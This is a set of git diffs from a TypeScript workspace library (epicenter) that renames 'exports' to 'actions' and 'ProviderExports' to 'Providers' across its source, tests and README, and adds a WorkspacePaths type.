+++ b/packages/epicenter/src/cli/discovery.test.ts
@@ -132,7 +132,7 @@ describe('loadWorkspaces', () => {
 		);
 		await writeFile(
 			workspacePath,
-			`export default { id: 'pages', tables: {}, exports: () => ({}) };`,
+			`export default { id: 'pages', tables: {}, actions: () => ({}) };`,
 		);
 
 		const result = await loadWorkspaces(testDir as ProjectDir);
@@ -144,11 +144,11 @@ describe('loadWorkspaces', () => {
 		const workspacesDir = path.join(testDir, '.epicenter', 'workspaces');
 		await writeFile(
 			path.join(workspacesDir, 'pages.workspace.ts'),
-			`export default { id: 'pages', tables: {}, exports: () => ({}) };`,
+			`export default { id: 'pages', tables: {}, actions: () => ({}) };`,
 		);
 		await writeFile(
 			path.join(workspacesDir, 'auth.workspace.ts'),
-			`export default { id: 'auth', tables: {}, exports: () => ({}) };`,
+			`export default { id: 'auth', tables: {}, actions: () => ({}) };`,
 		);
 
 		const result = await loadWorkspaces(testDir as ProjectDir);
@@ -161,7 +161,7 @@ describe('loadWorkspaces', () => {
 		const workspacesDir = path.join(testDir, '.epicenter', 'workspaces');
 		await writeFile(
 			path.join(workspacesDir, 'pages.workspace.ts'),
-			`export default { id: 'pages', tables: {}, exports: () => ({}) };`,
+			`export default { id: 'pages', tables: {}, actions: () => ({}) };`,
 		);
 		await writeFile(
 			path.join(workspacesDir, 'utils.ts'),

--- a/packages/epicenter/src/cli/integration.test.ts
+++ b/packages/epicenter/src/cli/integration.test.ts
@@ -22,7 +22,7 @@ describe('CLI Integration', () => {
 			sqlite: (c) => sqliteProvider(c),
 		},
 
-		exports: ({ tables }) => ({
+		actions: ({ tables }) => ({
 			createItem: defineMutation({
 				input: type({
 					name: 'string',

--- a/packages/epicenter/src/core/actions.ts
+++ b/packages/epicenter/src/core/actions.ts
@@ -59,9 +59,9 @@ export type StandardSchemaWithJSONSchema<TInput = unknown, TOutput = TInput> = {
  * })
  * ```
  */
-// biome-ignore lint/suspicious/noExplicitAny: ActionExports uses `any` for heterogeneous action collections.
-export type ActionExports = {
-	[key: string]: Action<any, any> | ActionExports;
+export type Actions = {
+	// biome-ignore lint/suspicious/noExplicitAny: Actions uses `any` for heterogeneous action collections.
+	[key: string]: Action<any, any> | Actions;
 }; /**
  * Action - a callable function with metadata for cross-boundary invocation.
  *
@@ -74,7 +74,7 @@ export type ActionExports = {
  * - Cross-workspace dependencies
  *
  * Input schemas must implement StandardSchemaV1 (validation) and
- * StandardJSONSchemaV1 (JSON Schema) for runtime validation and documentation 
+ * StandardJSONSchemaV1 (JSON Schema) for runtime validation and documentation
  * (MCP/CLI/OpenAPI) support.
  */
 export type Action<
@@ -582,33 +582,6 @@ type ActionConfig = {
 };
 
 /**
- * Type guard: Check if a value is an Action (Query or Mutation)
- *
- * Actions are identified by having a `type` property set to 'query' or 'mutation'.
- * This allows runtime filtering of workspace exports to identify which exports
- * should be mapped to API endpoints and MCP tools.
- *
- * @example
- * ```typescript
- * const exports = {
- *   getUser: defineQuery({ ... }),
- *   validateEmail: (email: string) => { ... }
- * };
- *
- * isAction(exports.getUser) // true
- * isAction(exports.validateEmail) // false
- * ```
- */
-export function isAction(value: unknown): value is Action {
-	return (
-		typeof value === 'function' &&
-		typeof (value as Action).type === 'string' &&
-		((value as Action).type === 'query' ||
-			(value as Action).type === 'mutation')
-	);
-}
-
-/**
  * Type guard: Check if a value is a Query action
  *
  * @example
@@ -641,40 +614,6 @@ export function isMutation(value: unknown): value is Mutation {
 }
 
 /**
- * Extract only the actions from workspace exports
- *
- * Used by API/MCP mappers to identify what to expose as endpoints.
- * Non-action exports are ignored and remain accessible through the client.
- *
- * @example
- * ```typescript
- * const exports = {
- *   getUser: defineQuery({ ... }),
- *   createUser: defineMutation({ ... }),
- *   validateEmail: (email: string) => { ... },
- *   constants: { MAX_USERS: 1000 }
- * };
- *
- * const actions = extractActions(exports);
- * // actions = { getUser, createUser } only
- *
- * // Use in API/MCP mapping
- * for (const [name, action] of Object.entries(actions)) {
- *   if (isQuery(action)) {
- *     app.get(`/api/${name}`, ...);
- *   } else if (isMutation(action)) {
- *     app.post(`/api/${name}`, ...);
- *   }
- * }
- * ```
- */
-export function extractActions(exports: ActionExports): ActionExports {
-	return Object.fromEntries(
-		Object.entries(exports).filter(([_, value]) => isAction(value)),
-	) as ActionExports;
-}
-
-/**
  * Type guard: Check if a value is a namespace (plain object that might contain actions)
  *
  * A namespace is any plain object that is not an action itself.
@@ -703,19 +642,19 @@ export function isNamespace(value: unknown): value is Record<string, unknown> {
 }
 
 /**
- * Recursively walk through exports and yield all actions with their paths.
+ * Recursively walk through actions and yield each action with its path.
  *
- * This generator function traverses a nested export structure and yields
+ * This generator function traverses a nested action structure and yields
  * each action along with its path from the root. The path is an array of
  * keys that identifies the action's location in the hierarchy.
  *
- * @param exports - The workspace exports object to walk through
+ * @param actions - The workspace actions object to walk through
  * @param path - Current path array (used internally for recursion)
  * @yields Objects containing the action path and the action itself
  *
  * @example
  * ```typescript
- * const exports = {
+ * const actions = {
  *   users: {
  *     getAll: defineQuery({ ... }),
  *     crud: {
@@ -725,7 +664,7 @@ export function isNamespace(value: unknown): value is Record<string, unknown> {
  *   health: defineQuery({ ... })
  * };
  *
- * for (const { path, action } of walkActions(exports)) {
+ * for (const { path, action } of walkActions(actions)) {
  *   // First: path = ['users', 'getAll'], action = Query
  *   // Second: path = ['users', 'crud', 'create'], action = Mutation
  *   // Third: path = ['health'], action = Query
@@ -733,12 +672,12 @@ export function isNamespace(value: unknown): value is Record<string, unknown> {
  * ```
  */
 export function* walkActions(
-	exports: unknown,
+	actions: unknown,
 	path: string[] = [],
 ): Generator<{ path: string[]; action: Action }> {
-	if (!exports || typeof exports !== 'object') return;
+	if (!actions || typeof actions !== 'object') return;
 
-	for (const [key, value] of Object.entries(exports)) {
+	for (const [key, value] of Object.entries(actions)) {
 		if (isAction(value)) {
 			// Found an action, yield it with its full path
 			yield { path: [...path, key], action: value };
@@ -751,27 +690,23 @@ export function* walkActions(
 }
 
 /**
- * Helper to define workspace exports with full type inference
+ * Helper to define workspace actions with full type inference
  *
- * Identity function similar to defineIndexExports. Provides type safety
- * and better IDE support when defining workspace exports.
+ * Identity function that provides type safety and better IDE support
+ * when defining workspace actions.
  *
  * @example
  * ```typescript
- * const exports = defineActionExports({
+ * const actions = defineActions({
  *   getUser: defineQuery({ ... }),
  *   createUser: defineMutation({ ... }),
- *   validateEmail: (email: string) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email),
- *   constants: { MAX_USERS: 1000 }
  * });
  * // Type is fully inferred: {
  * //   getUser: Query<...>,
  * //   createUser: Mutation<...>,
- * //   validateEmail: (email: string) => boolean,
- * //   constants: { MAX_USERS: number }
  * // }
  * ```
  */
-export function defineActionExports<T extends ActionExports>(exports: T): T {
-	return exports;
+export function defineActions<T extends Actions>(actions: T): T {
+	return actions;
 }

--- a/packages/epicenter/src/core/epicenter.test.ts
+++ b/packages/epicenter/src/core/epicenter.test.ts
@@ -14,14 +14,14 @@ describe('Epicenter Error Handling', () => {
 			id: 'duplicate',
 			tables: { items: { id: id(), value: text() } },
 			providers: {},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		const workspace2 = defineWorkspace({
 			id: 'duplicate',
 			tables: { items: { id: id(), value: text() } },
 			providers: {},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		expect(() => createClient([workspace1, workspace2])).toThrow(
@@ -42,7 +42,7 @@ describe('Action Exposure and Dependency Resolution', () => {
 				},
 			},
 			providers: {},
-			exports: ({ workspaces }) => ({
+			actions: ({ workspaces }) => ({
 				getValue: defineQuery({
 					handler: () => Ok(`value-from-${workspaceId}`),
 				}),

--- a/packages/epicenter/src/core/provider.browser.ts
+++ b/packages/epicenter/src/core/provider.browser.ts
@@ -1,8 +1,8 @@
 export {
-	defineProviderExports,
-	type InferProviderExports,
+	defineProviders,
+	type InferProviders,
 	type Provider,
 	type ProviderContext,
-	type ProviderExports,
+	type Providers,
 	type WorkspaceProviderMap,
 } from './provider.shared';

--- a/packages/epicenter/src/core/provider.node.ts
+++ b/packages/epicenter/src/core/provider.node.ts
@@ -1,8 +1,8 @@
 export {
-	defineProviderExports,
-	type InferProviderExports,
+	defineProviders,
+	type InferProviders,
 	type Provider,
 	type ProviderContext,
-	type ProviderExports,
+	type Providers,
 	type WorkspaceProviderMap,
 } from './provider.shared';

--- a/packages/epicenter/src/core/provider.shared.ts
+++ b/packages/epicenter/src/core/provider.shared.ts
@@ -31,21 +31,19 @@ export type ProviderContext<TSchema extends WorkspaceSchema = WorkspaceSchema> =
 /**
  * Provider exports - returned values accessible via `providers.{name}`.
  */
-export type ProviderExports = {
+export type Providers = {
 	whenSynced?: Promise<unknown>;
 	destroy?: () => void | Promise<void>;
 	[key: string]: unknown;
 };
 
-export type WorkspaceProviderMap = Record<string, ProviderExports>;
+export type WorkspaceProviderMap = Record<string, Providers>;
 
-export type InferProviderExports<P> = P extends (context: any) => infer R
+export type InferProviders<P> = P extends (context: any) => infer R
 	? Awaited<R>
 	: Record<string, never>;
 
-export function defineProviderExports<T extends ProviderExports>(
-	exports: T,
-): T {
+export function defineProviders<T extends Providers>(exports: T): T {
 	return exports;
 }
 
@@ -54,7 +52,7 @@ export function defineProviderExports<T extends ProviderExports>(
  */
 export type Provider<
 	TSchema extends WorkspaceSchema = WorkspaceSchema,
-	TExports extends ProviderExports = ProviderExports,
+	TExports extends Providers = Providers,
 > = (
 	context: ProviderContext<TSchema>,
 ) => TExports | void | Promise<TExports | void>;

--- a/packages/epicenter/src/core/provider.ts
+++ b/packages/epicenter/src/core/provider.ts
@@ -1,8 +1,8 @@
 export {
-	defineProviderExports,
-	type InferProviderExports,
+	defineProviders,
+	type InferProviders,
 	type Provider,
 	type ProviderContext,
-	type ProviderExports,
+	type Providers,
 	type WorkspaceProviderMap,
 } from './provider.shared';

--- a/packages/epicenter/src/core/types.ts
+++ b/packages/epicenter/src/core/types.ts
@@ -138,3 +138,30 @@ export type ProviderPaths = {
 	/** Provider's isolated directory at `.epicenter/providers/{providerId}/`. */
 	provider: ProviderDir;
 };
+
+/**
+ * Filesystem paths available to workspace exports factory.
+ *
+ * This is a subset of `ProviderPaths` without the `provider` field,
+ * since workspace exports don't have a specific provider context.
+ *
+ * `undefined` in browser environments where filesystem access isn't available.
+ *
+ * @example
+ * ```typescript
+ * defineWorkspace({
+ *   actions: ({ paths }) => {
+ *     if (!paths) throw new Error('Requires Node.js');
+ *     const configPath = path.join(paths.project, 'config.json');
+ *     const dbPath = path.join(paths.epicenter, 'custom.db');
+ *     // ...
+ *   }
+ * });
+ * ```
+ */
+export type WorkspacePaths = {
+	/** Project root. Use for user-facing content (markdown vaults, configs). */
+	project: ProjectDir;
+	/** The `.epicenter` directory at `{projectDir}/.epicenter`. */
+	epicenter: EpicenterDir;
+};

--- a/packages/epicenter/src/core/workspace.test.ts
+++ b/packages/epicenter/src/core/workspace.test.ts
@@ -36,7 +36,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-a');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceB = defineWorkspace({
 			id: 'workspace-b',
@@ -52,7 +52,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-b');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		// Flat dependency resolution: C must declare ALL transitive dependencies
@@ -71,7 +71,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-c');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		// Initialize workspace C
@@ -99,7 +99,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-d');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceA = defineWorkspace({
 			id: 'workspace-a',
@@ -115,7 +115,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-a');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceB = defineWorkspace({
 			id: 'workspace-b',
@@ -131,7 +131,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-b');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		// Flat dependency resolution: C must declare ALL transitive dependencies
@@ -150,7 +150,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-c');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		await createClient(workspaceC);
@@ -183,7 +183,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-x');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceY = defineWorkspace({
 			id: 'workspace-y',
@@ -198,7 +198,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-y');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceZ = defineWorkspace({
 			id: 'workspace-z',
@@ -214,7 +214,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-z');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		await createClient(workspaceZ);
@@ -238,7 +238,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({}),
+			actions: () => ({}),
 		};
 
 		const workspaceB: any = {
@@ -251,7 +251,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({}),
+			actions: () => ({}),
 		};
 
 		// Create circular reference
@@ -288,7 +288,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-a');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceB = defineWorkspace({
 			id: 'workspace-b',
@@ -304,7 +304,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-b');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceC = defineWorkspace({
 			id: 'workspace-c',
@@ -320,7 +320,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-c');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceD = defineWorkspace({
 			id: 'workspace-d',
@@ -336,7 +336,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-d');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 		const workspaceE = defineWorkspace({
 			id: 'workspace-e',
@@ -352,7 +352,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-e');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		// F must declare ALL transitive dependencies (flat resolution)
@@ -376,7 +376,7 @@ describe('createClient - Topological Sort', () => {
 					initOrder.push('workspace-f');
 				},
 			},
-			exports: () => ({}),
+			actions: () => ({}),
 		});
 
 		await createClient(workspaceF);
@@ -417,7 +417,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({
+			actions: () => ({
 				getValue: defineQuery({
 					handler: () => {
 						return Ok('value-from-a');
@@ -437,7 +437,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: ({ workspaces }) => ({
+			actions: ({ workspaces }) => ({
 				getValueFromA: defineQuery({
 					handler: async () => {
 						// Access workspace A's action
@@ -465,7 +465,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({
+			actions: () => ({
 				getValueFromA: defineQuery({
 					handler: () => Ok('value-from-a'),
 				}),
@@ -482,7 +482,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: ({ workspaces }) => ({
+			actions: ({ workspaces }) => ({
 				getValueFromB: defineQuery({
 					handler: () => Ok('value-from-b'),
 				}),
@@ -518,7 +518,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({
+			actions: () => ({
 				getValue: defineQuery({
 					handler: () => Ok('value-from-a'),
 				}),
@@ -534,7 +534,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: () => ({
+			actions: () => ({
 				getValue: defineQuery({
 					handler: () => Ok('value-from-b'),
 				}),
@@ -551,7 +551,7 @@ describe('createClient - Topological Sort', () => {
 				},
 			},
 			providers: {},
-			exports: ({ workspaces }) => ({
+			actions: ({ workspaces }) => ({
 				getValue: defineQuery({
 					handler: () => Ok('value-from-c'),
 				}),
@@ -612,7 +612,7 @@ describe('Workspace Action Handlers', () => {
 			sqlite: (c) => sqliteProvider(c),
 		},
 
-		exports: ({ tables, providers }) => {
+		actions: ({ tables, providers }) => {
 			return {
 				listPosts: defineQuery({
 					handler: async () => {

--- a/packages/epicenter/src/core/workspace/README.md
+++ b/packages/epicenter/src/core/workspace/README.md
@@ -49,6 +49,7 @@ Both `createClient(workspaces)` and `createClient(workspace)` use the same initi
 Workspace clients have different initialization patterns depending on the environment:
 
 **Browser (synchronous)**:
+
 ```typescript
 // Browser: No await needed - returns immediately
 const client = createWorkspaceClient(workspace);
@@ -61,6 +62,7 @@ await client.whenSynced;
 ```
 
 **Node.js (async)**:
+
 ```typescript
 // Node.js: Await required - fully initializes before returning
 const client = await createWorkspaceClient(workspace);
@@ -87,7 +89,7 @@ Epicenter solves this using a minimal constraint pattern: dependency arrays are 
 // Minimal constraint for dependencies
 type AnyWorkspaceConfig = {
 	id: string;
-	exports: (context: any) => WorkspaceExports;
+	exports: (context: any) => ActionExports;
 };
 
 // Full workspace config
@@ -95,7 +97,7 @@ type WorkspaceConfig<
 	TDeps extends readonly AnyWorkspaceConfig[],
 	TSchema extends WorkspaceSchema,
 	TProviderMap extends WorkspaceProviderMap,
-	TExports extends WorkspaceExports,
+	TExports extends ActionExports,
 > = {
 	id: string;
 	tables: TSchema;

--- a/packages/epicenter/src/core/workspace/README.md
+++ b/packages/epicenter/src/core/workspace/README.md
@@ -89,7 +89,7 @@ Epicenter solves this using a minimal constraint pattern: dependency arrays are 
 // Minimal constraint for dependencies
 type AnyWorkspaceConfig = {
 	id: string;
-	exports: (context: any) => ActionExports;
+	exports: (context: any) => Actions;
 };
 
 // Full workspace config
@@ -97,7 +97,7 @@ type WorkspaceConfig<
 	TDeps extends readonly AnyWorkspaceConfig[],
 	TSchema extends WorkspaceSchema,
 	TProviderMap extends WorkspaceProviderMap,
-	TExports extends ActionExports,
+	TExports extends Actions,
 > = {
 	id: string;
 	tables: TSchema;

--- a/packages/epicenter/src/core/workspace/client.browser.ts
+++ b/packages/epicenter/src/core/workspace/client.browser.ts
@@ -8,7 +8,7 @@
  * @see https://github.com/yjs/y-indexeddb
  */
 import * as Y from 'yjs';
-import { type WorkspaceActionMap, type WorkspaceExports } from '../actions';
+import type { ActionExports } from '../actions';
 import { createEpicenterDb } from '../db/core';
 import type { ProviderExports, WorkspaceProviderMap } from '../provider';
 import { createWorkspaceValidators, type WorkspaceSchema } from '../schema';
@@ -21,7 +21,7 @@ import type { AnyWorkspaceConfig, WorkspaceConfig } from './config';
  * a `whenSynced` promise for waiting on provider initialization.
  * Actions (queries and mutations) are identified at runtime via type guards for API/MCP mapping.
  */
-export type WorkspaceClient<TExports extends WorkspaceExports> = TExports & {
+export type WorkspaceClient<TActions extends ActionExports> = TActions & {
 	/**
 	 * The underlying YJS document for this workspace.
 	 *
@@ -66,9 +66,10 @@ export type WorkspacesToClients<WS extends readonly AnyWorkspaceConfig[]> = {
 	[W in WS[number] as W extends { id: infer TId extends string }
 		? TId
 		: never]: W extends {
-		exports: (context: any) => infer TExports extends WorkspaceExports;
+		// biome-ignore lint/suspicious/noExplicitAny: Extracting action type from generic constraint
+		actions: (context: any) => infer TActions extends ActionExports;
 	}
-		? WorkspaceClient<TExports>
+		? WorkspaceClient<TActions>
 		: never;
 };
 
@@ -110,7 +111,7 @@ function validateWorkspaces(workspaces: readonly AnyWorkspaceConfig[]): void {
 	for (const workspace of workspaces) {
 		if (!workspace || typeof workspace !== 'object' || !workspace.id) {
 			throw new Error(
-				'Invalid workspace: workspaces must be workspace configs with id, schema, indexes, and actions',
+				'Invalid workspace: workspaces must be workspace configs with id and actions',
 			);
 		}
 	}
@@ -155,16 +156,16 @@ export function createClient<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TExports extends WorkspaceExports,
+	TActions extends ActionExports,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
 		TId,
 		TWorkspaceSchema,
 		TProviderResults,
-		TExports
+		TActions
 	>,
-): WorkspaceClient<TExports>;
+): WorkspaceClient<TActions>;
 
 /**
  * Create a client for multiple workspaces (browser, SYNCHRONOUS).
@@ -247,6 +248,7 @@ export function createClient(
 		);
 	}
 
+	// biome-ignore lint/suspicious/noExplicitAny: Type safety enforced by overload signatures
 	return workspaceClient as WorkspaceClient<any>;
 }
 
@@ -317,7 +319,7 @@ function initializeWorkspacesSync<
 				// Verify the dependency exists in registered configs (flat/hoisted model)
 				if (!workspaceConfigsMap.has(dep.id)) {
 					throw new Error(
-						`Missing dependency: workspace "${workspaceId}" depends on "${dep.id}", but it was not found in rootWorkspaceConfigs.\n\nFix: Add "${dep.id}" to rootWorkspaceConfigs array (flat/hoisted resolution).\nAll transitive dependencies must be declared at the root level.`,
+						`Missing dependency: workspace "${workspaceId}" depends on "${dep.id}", but it was not found.\n\nFix: Add "${dep.id}" to the workspaces array (flat/hoisted resolution).\nAll transitive dependencies must be declared at the root level.`,
 					);
 				}
 			}
@@ -432,6 +434,7 @@ function initializeWorkspacesSync<
 	 * When initializing workspace B that depends on A, we can safely
 	 * inject clients[A] because A was initialized earlier in the sorted order.
 	 */
+	// biome-ignore lint/suspicious/noExplicitAny: Map holds heterogeneous workspace clients
 	const clients = new Map<string, WorkspaceClient<any>>();
 
 	// Initialize all workspaces in topological order (synchronously)
@@ -439,11 +442,8 @@ function initializeWorkspacesSync<
 		const workspaceConfig = workspaceConfigsMap.get(workspaceId)!;
 
 		// Build the workspaceClients object by injecting already-initialized dependencies
-		// Key: dependency id, Value: full client with all exports (actions + utilities)
-		const workspaceClients: Record<
-			string,
-			WorkspaceClient<WorkspaceExports>
-		> = {};
+		// biome-ignore lint/suspicious/noExplicitAny: Dependency clients are heterogeneous
+		const workspaceClients: Record<string, WorkspaceClient<any>> = {};
 
 		if (
 			workspaceConfig.dependencies &&
@@ -462,7 +462,6 @@ function initializeWorkspacesSync<
 		const tables = createEpicenterDb(ydoc, workspaceConfig.tables);
 
 		// Create validators for runtime validation and arktype composition
-		// Exposed via exports context for use in migration scripts, external validation, etc.
 		const validators = createWorkspaceValidators(workspaceConfig.tables);
 
 		// Initialize all providers synchronously, collecting deferred sync promises
@@ -505,15 +504,16 @@ function initializeWorkspacesSync<
 			)
 			.then(() => {});
 
-		// Create workspace exports by calling the exports factory
-		const exports = workspaceConfig.exports({
+		// Create workspace actions by calling the actions factory
+		const actions = workspaceConfig.actions({
 			tables,
 			schema: workspaceConfig.tables,
 			validators,
 			providers,
-			workspaces: workspaceClients,
+			// biome-ignore lint/suspicious/noExplicitAny: Runtime types are correct, generic constraint too strict
+			workspaces: workspaceClients as any,
 			blobs: {} as any,
-			paths: undefined, // Browser has no filesystem paths
+			paths: undefined,
 		});
 
 		// Create async cleanup function
@@ -527,10 +527,10 @@ function initializeWorkspacesSync<
 			ydoc.destroy();
 		};
 
-		// Create the workspace client with all exports (actions + utilities)
-		// Filtering to just actions happens at the server/MCP level via iterActions()
+		// Create the workspace client with all actions
+		// Filtering to just action types happens at the server/MCP level via iterActions()
 		clients.set(workspaceId, {
-			...exports,
+			...actions,
 			$ydoc: ydoc,
 			whenSynced,
 			destroy: cleanup,
@@ -541,7 +541,7 @@ function initializeWorkspacesSync<
 	// Convert Map to typed object keyed by workspace id
 	const initializedWorkspaces: Record<
 		string,
-		WorkspaceClient<WorkspaceActionMap>
+		WorkspaceClient<ActionExports>
 	> = {};
 	for (const [workspaceId, client] of clients) {
 		initializedWorkspaces[workspaceId] = client;

--- a/packages/epicenter/src/core/workspace/client.browser.ts
+++ b/packages/epicenter/src/core/workspace/client.browser.ts
@@ -8,9 +8,9 @@
  * @see https://github.com/yjs/y-indexeddb
  */
 import * as Y from 'yjs';
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import { createEpicenterDb } from '../db/core';
-import type { ProviderExports, WorkspaceProviderMap } from '../provider';
+import type { Providers, WorkspaceProviderMap } from '../provider';
 import { createWorkspaceValidators, type WorkspaceSchema } from '../schema';
 import type { AnyWorkspaceConfig, WorkspaceConfig } from './config';
 
@@ -21,7 +21,7 @@ import type { AnyWorkspaceConfig, WorkspaceConfig } from './config';
  * a `whenSynced` promise for waiting on provider initialization.
  * Actions (queries and mutations) are identified at runtime via type guards for API/MCP mapping.
  */
-export type WorkspaceClient<TActions extends ActionExports> = TActions & {
+export type WorkspaceClient<TActions extends Actions> = TActions & {
 	/**
 	 * The underlying YJS document for this workspace.
 	 *
@@ -67,7 +67,7 @@ export type WorkspacesToClients<WS extends readonly AnyWorkspaceConfig[]> = {
 		? TId
 		: never]: W extends {
 		// biome-ignore lint/suspicious/noExplicitAny: Extracting action type from generic constraint
-		actions: (context: any) => infer TActions extends ActionExports;
+		actions: (context: any) => infer TActions extends Actions;
 	}
 		? WorkspaceClient<TActions>
 		: never;
@@ -156,7 +156,7 @@ export function createClient<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TActions extends ActionExports,
+	TActions extends Actions,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
@@ -466,8 +466,8 @@ function initializeWorkspacesSync<
 
 		// Initialize all providers synchronously, collecting deferred sync promises
 		// Browser providers return sync but may load data async via whenSynced
-		const providers: Record<string, ProviderExports> = {};
-		const providerPromises: Promise<ProviderExports>[] = [];
+		const providers: Record<string, Providers> = {};
+		const providerPromises: Promise<Providers>[] = [];
 
 		for (const [providerId, providerFn] of Object.entries(
 			workspaceConfig.providers,
@@ -539,10 +539,7 @@ function initializeWorkspacesSync<
 	}
 
 	// Convert Map to typed object keyed by workspace id
-	const initializedWorkspaces: Record<
-		string,
-		WorkspaceClient<ActionExports>
-	> = {};
+	const initializedWorkspaces: Record<string, WorkspaceClient<Actions>> = {};
 	for (const [workspaceId, client] of clients) {
 		initializedWorkspaces[workspaceId] = client;
 	}

--- a/packages/epicenter/src/core/workspace/client.node.ts
+++ b/packages/epicenter/src/core/workspace/client.node.ts
@@ -173,17 +173,17 @@ export async function createClient<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TExports extends ActionExports,
+	TActions extends ActionExports,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
 		TId,
 		TWorkspaceSchema,
 		TProviderResults,
-		TExports
+		TActions
 	>,
 	options?: CreateClientOptions,
-): Promise<WorkspaceClient<TExports>>;
+): Promise<WorkspaceClient<TActions>>;
 
 /**
  * Create a client for multiple workspaces (Node.js, ASYNCHRONOUS).

--- a/packages/epicenter/src/core/workspace/client.node.ts
+++ b/packages/epicenter/src/core/workspace/client.node.ts
@@ -7,10 +7,10 @@
  */
 import path from 'node:path';
 import * as Y from 'yjs';
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import { createEpicenterDb } from '../db/core';
 import { buildProviderPaths, getEpicenterDir } from '../paths';
-import type { ProviderExports, WorkspaceProviderMap } from '../provider';
+import type { Providers, WorkspaceProviderMap } from '../provider';
 import { createWorkspaceValidators, type WorkspaceSchema } from '../schema';
 import type { ProjectDir, ProviderPaths } from '../types';
 import type {
@@ -25,7 +25,7 @@ import type {
  * Unlike browser clients, Node.js clients are fully initialized before returning.
  * Actions (queries and mutations) are identified at runtime via type guards for API/MCP mapping.
  */
-export type WorkspaceClient<TActions extends ActionExports> = TActions & {
+export type WorkspaceClient<TActions extends Actions> = TActions & {
 	/**
 	 * The underlying YJS document for this workspace.
 	 *
@@ -53,7 +53,7 @@ export type WorkspacesToClients<WS extends readonly AnyWorkspaceConfig[]> = {
 		? TId
 		: never]: W extends {
 		// biome-ignore lint/suspicious/noExplicitAny: Extracting action type from generic constraint
-		actions: (context: any) => infer TActions extends ActionExports;
+		actions: (context: any) => infer TActions extends Actions;
 	}
 		? WorkspaceClient<TActions>
 		: never;
@@ -173,7 +173,7 @@ export async function createClient<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TActions extends ActionExports,
+	TActions extends Actions,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
@@ -514,7 +514,7 @@ async function initializeWorkspaces<
 					},
 				),
 			),
-		) as Record<string, ProviderExports>;
+		) as Record<string, Providers>;
 
 		const workspacePaths: WorkspacePaths | undefined = projectDir
 			? {
@@ -558,10 +558,7 @@ async function initializeWorkspaces<
 	}
 
 	// Convert Map to typed object keyed by workspace id
-	const initializedWorkspaces: Record<
-		string,
-		WorkspaceClient<ActionExports>
-	> = {};
+	const initializedWorkspaces: Record<string, WorkspaceClient<Actions>> = {};
 	for (const [workspaceId, client] of clients) {
 		initializedWorkspaces[workspaceId] = client;
 	}

--- a/packages/epicenter/src/core/workspace/client.shared.ts
+++ b/packages/epicenter/src/core/workspace/client.shared.ts
@@ -5,13 +5,13 @@
  * Platform-specific types and initialization are in client.browser.ts and client.node.ts.
  */
 
-import { type Action, type WorkspaceExports, walkActions } from '../actions';
+import { type Action, type ActionExports, walkActions } from '../actions';
 
 /**
  * Base workspace client shape for iterActions compatibility.
  * Platform-specific clients extend this with additional properties.
  */
